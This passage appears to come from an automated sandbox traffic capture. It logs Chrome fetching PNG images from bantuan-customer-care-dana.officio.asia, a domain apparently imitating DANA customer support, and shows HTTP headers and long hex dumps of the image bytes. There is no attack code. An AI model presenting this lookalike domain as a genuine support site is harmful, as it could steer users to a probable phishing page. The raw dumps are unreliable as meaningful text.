                                                  2024-10-13 17:33:28 UTC1369INData Raw: e6 2c 62 1e 07 52 85 55 4d dd f3 bc 1c d0 c0 69 48 e7 61 ca 76 21 06 ad f5 33 77 ef de 1d 2b 01 bc 6f df 3e f8 be 9f 25 69 53 28 14 13 60 7e ae 2c be 45 d8 2d c6 d0 04 cb 95 86 2e 13 ab 27 35 29 a5 92 e0 ff ad 20 b0 7b 3a 4e 0b 62 76 2c e1 c4 c4 84 52 4a d9 4e 8f 2a c0 7e e1 a3 5a 61 35 5e 45 6b 9d 43 a3 47 41 2f 63 49 44 be 09 8b 13 44 44 ae 19 1f 1f 8f 95 f6 33 38 38 28 a9 54 ca b3 98 82 44 24 64 d7 1b 8e 41 40 d2 a6 00 56 88 9f 1b 02 41 10 d8 9c 97 84 49 f9 4b ca e2 1b c0 ee 02 1c ab 35 00 00 ba bb bb 05 f6 37 86 49 f0 ff 02 00 0a 85 82 d5 b9 aa 94 6a 19 19 19 71 41 58 15 42 33 f4 37 61 37 09 bf b3 a7 a7 27 76 63 ee fb be ed dd 78 52 16 5e 00 d0 36 cd 8f 71 c5 f3 ac cb 04 3d 34 34 64 bb 8d 35 63 33 17 3e ce 4c 4d 4d 89 d6 da f6 24 48 c4 46 1c 00 48 5a
                                                  Data Ascii: ,bRUMiHav!3w+o>%iS(`~,E-.'5) {:Nbv,RJN*~Za5^EkCGA/cIDDD388(TD$dA@VAIK57IjqAXB37a7'vcxR^6q=44d5c3>LMM$HFHZ
                                                  2024-10-13 17:33:28 UTC1369INData Raw: c0 d1 13 c7 34 a4 20 88 95 67 c4 e1 68 08 a2 f0 01 c7 7e 4b d9 d3 d3 d3 0e e0 b9 96 9b 39 0a 60 3a 3c 1d 28 36 38 0d d8 01 00 9e e7 c5 6a 5e 3a 1c 8d 40 24 1a 70 9c 4f 43 3a 76 ec 58 8b d6 fa 57 00 6c b0 d9 4e 10 04 1f 87 89 fe 73 38 62 47 10 04 b1 b7 54 39 1c eb 8d 86 3e 0d a9 bf bf 5f 6d df be fd 5a a5 d4 bb 60 d7 54 1e 78 9e 37 24 22 b1 b3 f3 85 26 68 a7 fd 44 48 1c 7d c0 11 44 41 27 02 57 88 c3 11 25 0d 7d 1e f0 1b df f8 c6 36 ad f5 db 01 b4 59 6e aa 00 e0 b4 e5 36 d6 82 5b 75 22 24 8e 3e 60 87 c3 11 3d 91 e4 01 c7 51 03 26 d9 04 e0 26 00 2f 89 a0 b9 ff 07 20 7e 6a cf 59 9c 06 1c 21 71 d4 80 1d d1 11 16 7e a9 77 37 1c 31 a0 51 35 60 01 b0 0d c0 1f 02 88 42 1d f9 18 80 a5 08 da 59 35 55 85 38 9c 16 ec 70 44 40 4c 85 af 7b ff 23 a4 52 1f a3 21 7d c0 24
                                                  Data Ascii: 4 gh~K9`:<(68j^:@$pOC:vXWlNs8bGT9>_mZ`Tx7$"&hDH}DA'W%}6Yn6[u"$>`=Q&&/ ~jY!q~w71Q5`BY5U8pD@L{#R!}$
                                                  2024-10-13 17:33:28 UTC1369INData Raw: c0 57 45 24 f6 e6 94 4b 91 24 01 b9 0e 70 82 ce d1 90 14 8b 89 d2 53 ac be a7 95 e3 39 9d 06 bc 7a b4 d6 fa 2f f3 f9 fc 9f 8a c8 6c bd 3b 53 0b 6c e7 00 a7 52 a9 d8 1f 48 11 21 0d a7 05 24 c1 fd e0 88 84 4a 5a a9 23 c4 09 e0 d5 a1 01 7c 45 29 f5 ee 5c 2e b7 2e 6c 95 83 83 83 12 81 06 9c 18 01 bc 69 53 94 27 56 3a e2 4a 58 e2 d6 51 43 32 99 8c 1b d3 65 58 3f 0d 69 1d 51 49 37 fa 6f 00 c6 dd ae 7e 55 24 69 a3 b7 a6 b4 08 c7 f9 49 4a 04 74 48 62 0a 87 38 ec 50 28 14 ac ae 01 95 f7 c1 f9 80 57 46 00 e0 d3 8b 8b 8b af 03 70 3c 69 c5 36 ea 4c e5 b0 8c 24 e0 04 af 25 2a 3e af b8 43 12 e9 74 3a e2 13 54 1b 06 ee df bf bf de 7d 58 11 cd cd cd 91 4c 00 a7 01 5f 9a 32 80 8f 01 b8 33 9b cd 9e 70 c2 d7 e1 58 ff 38 0d b8 f6 14 8b 45 ee db b7 2f 11 3b 9b 42 a1 60 75 02
                                                  Data Ascii: WE$K$pS9z/l;SlRH!$JZ#|E)\..liS'V:JXQC2eX?iQI7o~U$iIJtHb8P(WFp<i6L$%*>Ct:T}XL_23pX8E/;B`u
                                                  2024-10-13 17:33:28 UTC325INData Raw: 22 bc ad b5 30 0f e0 4d 00 7e 1a 40 73 d5 7a 07 00 d5 b2 ea 9c f7 5d 6b ed 01 08 2e 30 47 a0 b5 5e 02 30 3c 33 33 f3 f0 e6 cd 9b 75 c5 e9 25 00 9a 70 81 1d ff c8 c8 08 7a 7b 7b d7 74 37 2b f9 8c 0b 5c 53 d9 00 b0 ea ab f2 73 c4 6d 22 27 15 92 32 34 34 94 6a 6f 6f 57 3b 77 ee c4 c8 c8 88 00 a8 3c 0f 02 c0 f0 f0 f0 99 eb 97 57 b7 ea ed ed c5 c8 c8 c8 39 ff ef ed ed e5 fe fd fb fd db 6f bf 3d 49 fe 3f 00 90 83 07 0f a6 da db db 55 ad aa 78 3d f4 d0 43 5c 58 58 88 f5 58 90 54 30 81 99 02 40 2a cf b3 1a df f7 b9 73 e7 ce 73 fe 0c 00 86 87 87 65 d9 bc a9 7e 4f 83 a4 9d 22 d6 df df af de fd ee 77 2b 00 5e e5 9e 2e 46 f5 fc bf c0 ef 2b e3 11 c4 b9 c2 1e 49 35 34 34 e4 b5 b7 b7 9f 91 20 a9 54 4a 7a 7b 7b 35 42 f9 b0 fc 19 57 8f cf f2 71 f0 7d 9f b3 b3 b3 3a 89 29
                                                  Data Ascii: "0M~@sz]k.0G^0<33u%pz{{t7+\Ssm"'244jooW;w<W9o=I?Ux=C\XXXT0@*sse~O"w+^.F+I544 TJz{{5BWq}:)


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.449767172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC637OUTGET /ast/img/bi.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC695INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 16542
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:22:08 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7077
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRDdpYb9RKWT3WaeegCHJCwzdpQUr%2FPkCIu%2BHAGaIwCXIPvH3Z%2ByF%2Bhgj09jpAgQnwrRzN8glo6plvnPpEIu4B26cJe159k0Mw4YBpCu9cgIZf6wpI2A0qILgaR%2BJEDdJUa1VukpJTtfHoL30xMl5YjHicCujLjoddU%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132b589619f3-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC674INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 68 00 00 00 c8 08 06 00 00 00 c5 8e 7b 8f 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 79 98 24 55 95 b7 df 13 99 b5 f6 de 74 b3 36 b2 36 3b 0a b4 cb 80 0a e2 82 88 88 c0 27 a8 e3 86 0b 38 2a 2e 28 e2 8a 36 33 32 22 6e e8 88 83 3a 2a ee 08 b8 cc e0 07 8a 62 a3 a8 0c 7e a0 80 ec cd d2 d0 74 d3 f4 de d5 4b 55 56 65 dc df f7 c7 8d e8 cc ca ce ca 8c cc ca da ef fb 3c f5 f4 52 11 37 4e dc b8 71 e2 dc 73 cf 39 17 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 00 80 8d b5 00 81 40 56 24 b5 03 5d c9 4f 3b
                                                  Data Ascii: PNGIHDRh{sRGBsBIT|d IDATxy$Ut66;'8*.(632"n:*b~tKUVe<R7Nqs9@ @ @ @ @ @ @ @ @V$]O;
                                                  2024-10-13 17:33:28 UTC1369INData Raw: d6 f4 37 cd 6c e5 18 cb 13 98 24 04 05 1d 18 36 92 3a 81 d7 e0 95 f3 51 f8 24 93 a9 48 11 b8 15 b8 0c f8 55 c8 58 0c 0c 97 a0 a0 03 4d 93 58 cd 7b 00 9f 04 5e 07 cc 64 f8 63 6a 83 a4 07 cc 6c 40 d2 90 b1 d0 e9 ef 2a ff cc f2 fb 2a c7 76 9a d9 51 40 7e 98 b2 a7 ac 07 be 0d 7c 11 58 1d 32 14 03 81 c0 a8 22 a9 4d d2 cb 24 dd 2a a9 95 a9 7e bf 91 34 4f 92 8d e2 cf 3e 92 7a 5a 78 0f 92 e4 9c 73 37 49 7a 81 a4 a9 3a a3 08 04 02 a3 8d a4 2e 49 ef 95 b4 42 ad 55 ce 92 f4 9b 9e 9e 9e 9d 46 f9 7e f6 56 eb 15 b4 24 c5 92 1e 93 f4 56 49 1d a3 79 4f 81 c9 41 ab a6 74 81 29 82 a4 f9 c0 85 c0 3b f1 15 e5 5a cd 8c 19 33 66 1c 2a 69 03 d0 0f 6c 03 d6 9a 59 6f ab 2e 20 9f 4a 3e 0d e8 c4 bf 03 bb 30 32 0b 9a 11 b0 37 70 b9 73 6e 3f 49 5f 34 b3 0d 23 70 9d c0 24 25 f8 a0 03
                                                  Data Ascii: 7l$6:Q$HUXMX{^dcjl@**vQ@~|X2"M$*~4O>zZxs7Iz:.IBUF~V$VIyOAt);Z3f*ilYo. J>027psn?I_4#p$%
                                                  2024-10-13 17:33:28 UTC1369INData Raw: b3 bf 8f 90 2c d3 81 73 36 6f de 1c ac e8 29 48 50 d0 53 8c c4 7a 7e 0d f0 ac 51 bc 6c 27 0d 28 e8 31 b6 a0 c1 cb fa 3a 20 ab 9b c3 39 e7 96 8c a0 3c 47 cf 98 31 e3 94 11 6c 3f 30 4e 09 0a 7a ea b1 33 f0 3e 46 76 ff bd 4a 1a ba d6 38 b0 a0 c1 97 34 dd 2b cb 81 66 a6 28 8a ee 19 41 59 f2 c0 07 d4 e0 46 05 81 89 4f 50 d0 53 8b d4 32 dc 6d ac 05 a9 c5 38 b0 a0 c1 57 bf cb 5c 77 1a 18 c9 8d 60 0d 1f a7 fe aa 11 bc 46 60 1c 12 14 f4 14 42 d2 ae 92 5e 4d ed 32 a2 63 ce 38 b1 a0 23 1a fb 90 35 52 a3 ba 19 a6 01 a7 49 1a b2 06 6b 60 f2 11 14 f4 14 21 89 02 78 16 70 14 e3 3c 83 74 9c 58 d0 11 5e 29 66 65 a4 c3 15 0d 1f 13 1d b6 c8 9a 42 04 05 3d 75 e8 00 4e 35 b3 99 63 2d 48 3d c6 89 05 2d 7c aa 7a 56 76 1e 29 41 ca d8 09 38 5d d2 a4 2c ef 1a d8 91 a0 a0 a7 0e bb
                                                  Data Ascii: ,s6o)HPSz~Ql'(1: 9<G1l?0Nz3>FvJ84+f(AYFOPS2m8W\w`F`B^M2c8#5RIk`!xp<tX^)feB=uN5c-H=-|zVv)A8],
                                                  2024-10-13 17:33:28 UTC1369INData Raw: fb 22 c2 bb 2b 3e 0d bc 52 d2 fb 80 bf 27 8a 78 48 92 88 90 9b 25 dd 09 bc 19 f8 04 3e cc 6d cc 2c 58 e7 5c ae bc 5f 02 93 8b f0 64 27 29 4f 3f fd 74 43 e1 68 e3 89 8a 54 ef cc ca 4f 12 40 2f b0 5c d2 df 81 1b 80 2b 81 3b 87 38 a5 1d 38 1a b8 0e f8 97 75 eb d6 65 aa 4c 67 66 1b 81 cb 81 b3 80 db 94 5c 78 2c 88 a2 68 80 3a a5 51 03 13 97 60 41 4f 52 76 d9 65 97 98 0c 5b 36 8d 47 ea 24 aa 08 58 01 dc 0f 6c 70 ce 6d 04 9e 8e a2 e8 49 33 7b 12 58 d3 df df bf a5 bd bd 7d 0b 3e ad db 01 5f 04 8e 1a a2 3d c3 2f 1e 5e 3a 77 ee dc c3 24 7d cc cc 36 d5 93 31 f1 5d df 20 e9 11 33 fb 1c f0 2a c6 66 01 71 00 7f 8f 81 49 48 50 d0 93 17 87 8f 46 98 70 d4 49 54 29 3a e7 7e 1c 45 d1 85 80 a2 28 4a 5d 18 c2 47 7d 0c b2 26 33 6e f5 65 f8 b4 e9 73 80 9d b6 6d db f6 a1 ee ee
                                                  Data Ascii: "+>R'xH%>m,X\_d')O?tChTO@/\+;88ueLgf\x,h:Q`AORve[6G$XlpmI3{X}>_=/^:w$}61] 3*fqIHPFpIT):~E(J]G}&3nesm
                                                  2024-10-13 17:33:28 UTC1369INData Raw: eb 6c de bc f9 69 49 4b 47 50 9e 7a 08 1f ef fc 61 e0 fb 87 1e 7a 68 a6 0c 4c 49 bb 00 5f 01 0e a2 35 ae 8d 22 70 1d c1 f7 3c 65 09 0a 7a 8a 92 58 64 1f c3 97 c3 1c 49 14 c7 f1 3f 68 c0 af 3c 63 c6 8c 1e 33 fb 55 12 5a 36 da f4 e3 15 e2 6b 80 1f 64 f5 fb 4a 9a 09 7c 02 78 25 ad 7b af 9e 02 3e 67 66 13 6e 67 f6 40 6b 08 0a 7a 6a b3 14 f8 32 23 5b a3 63 55 2e 97 fb 7b d6 f0 34 00 33 eb c7 87 b4 dd cb e8 f9 a2 d3 3d fe 3e 0d 9c 6e 66 ff 2f 6b 42 88 a4 dd 80 cf 02 ef c1 57 bc 6b 05 db 92 36 97 b5 a8 bd 40 20 30 d1 90 b4 9b a4 bf 4a 72 6a 3d b1 a4 6f 4a 9a de 84 5c 26 e9 85 92 96 26 ed a4 f2 f5 4b ba b8 81 76 a6 25 32 54 e2 92 76 fb 93 fb 7f eb b6 6d db f6 94 d4 90 d1 22 69 6f 49 ff 93 b4 d3 ca 7e bb 4e d2 78 28 6d 1a 18 43 5a 59 06 31 30 01 31 b3 a7 24 5d 08
                                                  Data Ascii: liIKGPzazhLI_5"p<ezXdI?h<c3UZ6kdJ|x%{>gfng@kzj2#[cU.{43=>nf/kBWk6@ 0Jrj=oJ\&&Kv%2Tvm"ioI~Nx(mCZY101$]
                                                  2024-10-13 17:33:28 UTC1369INData Raw: eb eb fb 55 57 57 d7 63 63 2d 50 60 72 32 59 5e 98 c0 38 45 52 5b 5f 5f df 1e 9d 9d 9d ff 2c e9 f5 66 b6 0f 30 6d ac e5 6a 92 cd c0 c3 c0 f7 81 6b 80 a7 27 d3 b6 5e 81 40 60 8a 22 bf f1 eb 9e 92 ce 96 74 8d fc 86 ab 13 01 e7 9c 7b 5a d2 4f 24 bd 45 d2 6e 8d 26 ca 04 02 cd 12 2c e8 c0 a8 22 bf 77 e1 6c bc 6f fa 95 c0 69 c0 33 f0 56 f5 78 a8 96 27 fc 66 04 5b f0 35 3c 7e 01 dc 00 2c 33 b3 8d 63 29 58 60 ea 11 14 74 60 cc 90 4f 1c 99 06 fc 13 f0 62 e0 59 c0 01 92 16 24 49 23 a3 35 3e 85 5f 9c 5c 8e df a5 fc ef c0 4d c0 ed 40 6f 70 63 04 c6 8a a0 a0 03 e3 06 f9 f8 e7 bd 93 9f 23 81 45 c0 21 f8 8c bf 3c 90 c3 57 60 6c 66 9f 40 e1 17 f7 e2 e4 cf 22 be e8 ff bd 78 45 7c 17 b0 8c 60 29 07 c6 11 41 41 07 c6 25 f2 71 d0 ed f8 82 fb cf 00 0e 05 f6 77 ce ed 15 45 d1
                                                  Data Ascii: UWWcc-P`r2Y^8ER[__,f0mjk'^@`"t{ZO$En&,"wloi3Vx'f[5<~,3c)X`t`ObY$I#5>_\M@opc#E!<W`lf@"xE|`)AA%qwE
                                                  2024-10-13 17:33:28 UTC1369INData Raw: f7 24 1d 70 f5 d5 57 37 33 80 86 ba ce 7e 92 96 56 91 f1 d8 5a 3b 58 27 f7 77 9a 17 cd ad 94 74 e2 30 e5 30 49 8b 9c 73 cb cb 64 71 92 2e 4d 5e ce 6a e7 e4 25 bd d8 39 b7 56 d5 71 15 3f 43 1d b3 4e d2 8d 92 5e b3 74 e9 d2 8e 61 dc 43 b7 a4 f7 4b ba 43 52 5f 95 eb c4 92 62 e7 5c ac 8a 77 a8 8c ad 92 6e 2e 16 8b af 91 54 77 23 5d 49 0b 92 fe ef 93 f4 6f f2 bb d1 34 4d 4f 4f cf 4e 92 7e 95 c8 97 72 ab a4 7d 6a c8 30 5f 7e b7 f6 aa f7 3b c4 4f f9 33 e9 97 9f bd 0f d5 fe 74 49 9f 95 b4 5e 83 c7 46 b9 4e 2a ef cb ad 92 ce 1c a2 ad 6e 49 9f 71 ce f5 97 1d 1f c7 71 fc 55 35 e9 9e 90 1f bb af 95 b4 2d f9 79 5d 33 ed 34 72 c1 4e 49 bf 2e bf 01 49 57 49 ba 4c d2 17 24 7d 5b d2 ff 4a 7a aa e2 41 16 24 7d a6 d9 41 22 e9 10 49 2b 92 b6 06 24 7d 6c 18 f7 90 2a 68 27 e9
                                                  Data Ascii: $pW73~VZ;X'wt00Isdq.M^j%9Vq?CN^taCKCR_b\wn.Tw#]Io4MOON~r}j0_~;O3tI^FN*nIqqU5-y]34rNI.IWIL$}[JzA$}A"I+$}l*h'
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 5f 2e 97 bb 6a a8 05 ff e4 1d 5d 82 5f 24 ac 15 14 d0 cf e0 08 0e 47 fd 71 36 14 bb 03 af a8 fc cf 28 8a ce 52 93 b3 ff ed 6d d4 f8 9d 68 ac b3 ef 4d 7e 00 30 b3 fd a8 88 5c c8 c0 1b 81 19 c9 df e3 44 06 03 5e db d3 d3 33 b3 c1 b6 86 a2 dd cc 3e 0c bc 31 ab 65 53 41 4c e9 c1 66 8d 0a d9 1e 36 36 c4 bf 01 e8 ef ef 3f 14 f8 9c bc 2b c3 24 3d 01 9c db d1 d1 51 35 8a a2 c5 54 3e eb fe 6a 32 66 a4 2b 8a a2 f3 80 b7 34 f9 61 2d 97 c5 31 f8 45 aa 86 a8 78 16 b9 5c 8e f2 e8 a3 7a 98 d9 6a e0 63 c0 95 65 6d e5 80 7f 06 4e aa 7a 51 ef a3 3f df cc 9e 9f 84 3a 09 d8 08 bc 0b f8 65 33 61 87 66 26 33 7b 18 6f f0 2c a1 74 ef 1d 51 14 9d bd db 6e bb fd 53 35 ab b8 ca bd 46 c0 cb 80 4b 24 cd 6a 54 0e 4a 61 68 24 32 d4 fd e2 15 8b c5 34 aa ab 21 3a 3b 3b d7 02 57 cc 98 31
                                                  Data Ascii: _.j]_$Gq6(RmhM~0\D^3>1eSALf66?+$=Q5T>j2f+4a-1Ex\zjcemNzQ?:e3af&3{o,tQnS5FK$jTJah$24!:;;W1
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 0e 58 9c c5 4f 97 25 3a a0 0a d5 06 7b 7a dd 0f 03 9d 89 b5 74 3d 70 71 b2 9a 3f 11 51 6f 6f 6f da c7 17 4a fa 23 5e 61 e7 81 53 9c 73 17 48 9a 51 bb 09 c8 e5 72 23 3a 9d ce c8 6f 19 ec a2 3b 10 ef 67 04 ff b2 3d 9f d2 fb 23 e7 dc f5 89 15 dd 52 cc 4c ce b9 9b 18 6c ec 3c 83 d2 c7 61 a8 f3 62 e0 27 c0 d7 24 f5 e1 95 c8 41 78 25 dd 74 76 6e ab 91 8f 61 3f 7f a8 8f b7 99 6d 88 e3 f8 5a 4a f7 1f 01 c7 01 97 4b 5a d8 e4 42 7f ab 78 05 b0 40 12 92 36 02 69 a9 83 a7 f1 69 eb e9 38 3e 02 f8 a7 66 2e d0 f4 cd c9 c7 9e 2e 74 ce 9d 93 cf e7 af a0 b4 8a f9 58 1c c7 9f e8 ec ec 7c 34 63 3b 3b e1 17 32 c0 5b 90 bf be e8 a2 8b 36 03 5c 73 cd 35 5b 80 ab d2 63 cd ec 28 fc 22 5a 53 22 97 b5 b3 02 f8 a4 99 3d 9a 7c 14 da 80 b7 3a e7 de d6 a2 70 be 7a 18 70 3c f0 6f f8 99
                                                  Data Ascii: XO%:{zt=pq?QoooJ#^aSsHQr#:o;g=#RLl<ab'$Ax%tvna?mZJKZBx@6ii8>f..tX|4c;;2[6\s5[c("ZS"=|:pzp<o
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 1a bf 19 84 91 21 b6 19 c0 cc d6 46 51 f4 b9 62 b1 f8 7a 7c 28 6e 1a ed 64 c0 de 92 3e 0b 9c df 4c 72 48 03 61 76 27 e1 8d 0c f0 89 59 bf 4e dc 1c 95 3c 84 0f 91 4c 39 11 6f 90 0e 1f f9 42 32 e7 aa 44 d5 62 49 f2 05 8e fe 45 d2 9d 1a 5c 1a f3 9b aa 51 48 48 be 48 cd c3 69 db c9 4a 6e d5 87 24 5f 8c e4 2f 65 ed af 95 f4 82 6a c7 56 9c 57 5e 2c e9 81 5a 8b 09 f2 05 9f fe 47 a5 2a 6a 03 92 2e 5f b7 6e dd cc 8a e3 de a1 52 11 99 bb b3 7c ad e5 8b c8 94 d7 06 be 54 d2 41 1a 5c fd cc c9 57 b0 6b d9 76 39 8d 20 e9 b8 32 59 14 c7 f1 05 f5 2c 2b ed 58 2c e9 6f db b6 6d 1b 32 ba 20 19 2b 3f 4d 2a 0b 4a be 20 d1 15 eb d7 af 9f 55 71 dc 6b 54 2a 96 f4 0f d5 a8 43 9c 60 f2 35 98 cb a9 5b 2c a9 ce bd cd 97 b4 a6 ac bd 95 4a aa 93 49 7a 86 a4 0d 65 bf db 5a 28 14 46 6c
                                                  Data Ascii: !FQbz|(nd>LrHav'YN<L9oB2DbIE\QHHHiJn$_/ejVW^,ZG*j._nR|TA\Wkv9 2Y,+X,om2 +?M*J UqkT*C`5[,JIzeZ(Fl


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.449771172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC638OUTGET /ast/img/kom.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC690INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 8484
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:23:08 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7077
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3CyJR0TvFLtYUlLcgKqk9fayqsym9f5JmfI25Zbx9kcUKLnTJSCRuRLFSPh3IYpwO7ZOlLNCRUoQj2EfrtChnbPRA%2BD0H3XgGjjFOi%2BTJG2x0en61t3dS%2B1sMB5je0Y5ZnSXV3xwUhzSpbb1ghoqpFIFyZw3qzrGONc%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132b7d09c333-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC679INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 94 25 75 75 ef bf bb ce e9 ee e9 79 0f c3 0c 6f e4 29 32 0a 0c 90 0b 78 81 18 41 34 e2 03 44 63 f0 c9 12 8d 88 57 4d 94 45 ae 17 91 c7 8d 9a 64 2d f5 e6 1a 0d 6a 6e 1e be a2 4c 04 d4 28 48 40 c6 84 a0 04 26 f2 90 19 90 01 5a 18 98 07 c3 34 dd 3d fd 3e 55 fb 7b ff a8 aa 9e 5f 57 57 9d 53 75 4e 9d 53 75 ba 7f 9f b5 66 cd e9 aa df 63 d7 af 7e bb 7e ef bd 01 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b 65 41 23 45 0b b0 10 98 98 98 38
                                                  Data Ascii: PNGIHDRXsRGBsBIT|d IDATx{%uuyo)2xA4DcWMEd-jnL(H@&Z4=>U{_WWSuNSufc~~bX,bX,bX,bX,bX,bX,bX,eA#E8
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 44 a7 98 d7 0a 42 f2 61 00 27 14 2d 47 87 d9 05 60 33 80 5f 01 78 04 c0 4e 00 3b 26 26 26 f6 f4 f7 f7 bb a3 a3 a3 ba 74 e9 52 17 7e ef c1 01 50 05 b0 1c c0 1a 00 07 03 38 4a 55 4f 76 1c e7 65 00 8e 03 d0 17 93 c7 dd 22 f2 bb 1d 78 96 c2 99 b7 0a 42 f2 09 00 47 17 2d 47 bb 20 79 af 88 7c 79 64 64 e4 b6 e5 cb 97 bf d8 ee 99 a6 60 f6 6f 99 eb ba a7 57 ab d5 f7 01 38 4c 44 e6 7d cb 3c 2f 15 84 e4 83 00 4e 2a 5a 8e 9c 20 80 29 00 37 00 f8 8c 88 0c 16 2c cf 82 a2 5a b4 00 79 43 f2 6e 74 bf 72 78 00 ee 86 7f 86 e3 99 a2 85 59 c8 cc 2b 05 f1 3c ef 5a 00 67 15 2d 47 93 28 7c c3 0c ef 11 91 bd ed c8 80 a4 6c d9 b2 a5 67 dd ba 75 7d ae eb 9e 5a ad 56 d7 03 78 05 80 15 24 fb 01 88 88 8c 02 18 05 b0 b9 56 ab dd d5 d3 d3 b3 15 c0 84 88 68 3b 64 b2 74 08 92 67 b6 f9 18
                                                  Data Ascii: DBa'-G`3_xN;&&&tR~P8JUOve"xBG-G y|ydd`oW8LD}</N*Z )7,ZyCntrxY+<Zg-G(|lgu}ZVx$Vh;dtg
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 7b 57 43 f2 90 fc ea d0 0c 89 de 91 54 75 a8 0d f9 b5 83 49 92 df 20 f9 12 96 74 37 2c c9 8a eb ba e7 93 7c 80 e9 15 a6 d4 5b df cb d8 c5 3a a2 0d 69 fe 49 dc 45 92 5f 11 91 32 1b 56 98 04 f0 01 f8 5d a3 45 22 72 89 88 3c dd 6e 8f b6 cd 22 22 5e b5 5a bd 55 44 4e 0e ba 6e cb 01 dc de 20 da 61 1d 10 6d fe e0 79 de c7 73 fe f2 c6 f6 9b 49 2e ca 39 9f bc 50 55 fd 01 bb 60 11 2d 0b 24 cf a3 ef 59 2b ca 7b 8b 96 ad 1e a5 3b 72 eb 38 4e ae 1e 6a 3d cf 8b 9d 6b 27 39 58 b2 9d 0e 04 f0 5e 11 f9 76 db 32 f0 7d 21 1e 04 e0 40 00 6b e1 9b 25 12 00 a3 9e e7 ed ad 54 2a db e1 fb 34 79 2e 6f a7 9d 22 72 07 80 aa eb ba 6f ae 54 2a 3f 08 f2 85 aa 1e 99 67 3e f3 1e 55 fd 59 9e 5f e3 b8 3c 48 fe 51 8e 79 b4 84 aa 92 64 6e 5e 99 e8 8f e1 fe 4c 55 1f 21 39 e1 67 d1 f4 1c 84
                                                  Data Ascii: {WCTuI t7,|[:iIE_2V]E"r<n""^ZUDNn amysI.9PU`-$Y+{;r8Nj=k'9X^v2}!@k%T*4y.o"roT*?g>UY_<HQydn^LU!9g
